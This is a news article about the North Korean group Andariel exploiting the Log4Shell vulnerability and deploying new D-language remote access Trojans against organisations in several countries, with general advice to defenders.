North Korean hackers remain relentless in exploiting the Log4Shell vulnerability worldwide.
Recent reports reveal that these hackers, operating under the guise of "Andariel" within the Lazarus collective, have introduced three new remote access Trojans (RATs).
What sets these attacks apart is the use of the rarely seen "D" (dlang) programming language, adding an extra layer of sophistication.
Andariel's Tactical Mastery: A Lazarus Entity
"Andariel," known by aliases such as Onyx Sleet and Plutonium, operates as a specialized unit within the Lazarus collective, according to Dark Reading.
Focused on securing initial access and ensuring long-term persistence, Andariel primarily serves the interests of the Kim Jung Un regime. However, their activities extend beyond espionage, occasionally involving ransomware attacks against healthcare organizations.
Log4Shell as the Gateway
Andariel's recent exploits have leveraged the Log4Shell vulnerability, marking their entry point into systems. This historic vulnerability in Apache Log4j rated at a maximum severity of 10 on the CVSS bug—severity scale (CVE-2021-44228), remains a favored choice due to its widespread impact.
"For a long time tooling has been collapsing - everybody kind of uses the same tool sets to obscure attribution. Lazarus has gone in the exact opposite direction. They go crazy with writing bespoke malware," Cisco Talos head of outreach Nick Biasini said when asked about the behavior of the North Korean hackers.
Despite being two years old, more than a third (38%) of active applications still use vulnerable Log4j versions, as reported by Veracode.
Andariel's Stealth Weapon
Andariel's distinguishing factor lies in its use of the "D" programming language for crafting novel malware. This offshoot of C++ adds a unique challenge for detection and analysis. The recent attacks observed by Cisco Talos targeted an agriculture organization in South America, a European manufacturing company, and an American subsidiary of a Korean physical security company.
The group's toolkit includes three new remote-access Trojans, each serving a distinct purpose. "NineRAT" operates as a dropper and backdoor, utilizing Telegram as its command-and-control (C2) base. "DLRAT" specializes in downloading additional malware and executing commands on infected hosts. Lastly, "BottomLoader" functions as a downloader.
Once Log4Shell provides the initial access, Andariel ensures persistence through its custom proxy tool, "HazyLoad." This is followed by the creation of new users with administrative privileges on the host machine. Subsequently, credential harvesting tools like Mimikatz and Andariel's custom malware tools are deployed to further the intrusion.
The Challenge of Unconventional Programming: DPRK's Signature Approach
North Korean hackers, particularly those under the Lazarus umbrella, exhibit a distinctive approach to evade detection. They achieve this by mass-producing custom malware in unconventional programming languages, catching adversaries off guard.
The use of languages like "D" adds complexity, making it harder for traditional detection programs to identify and flag their activities.
Lazarus might have adopted a new persona under Andariel, but that does not mean that it will stop its cyber operations anytime soon. For organizations, practicing extra vigilance is always required to mitigate security risks.
The deployment of malware written in less common languages demands a nuanced understanding of detection mechanisms. Traditional malware detection tools, often tailored for more common languages, may struggle against the unique challenges presented by these North Korean hackers.
Organizations must remain adaptable, continuously refining their defense strategies to counter the innovative tactics employed by persistent threat actors like Andariel within the Lazarus collective.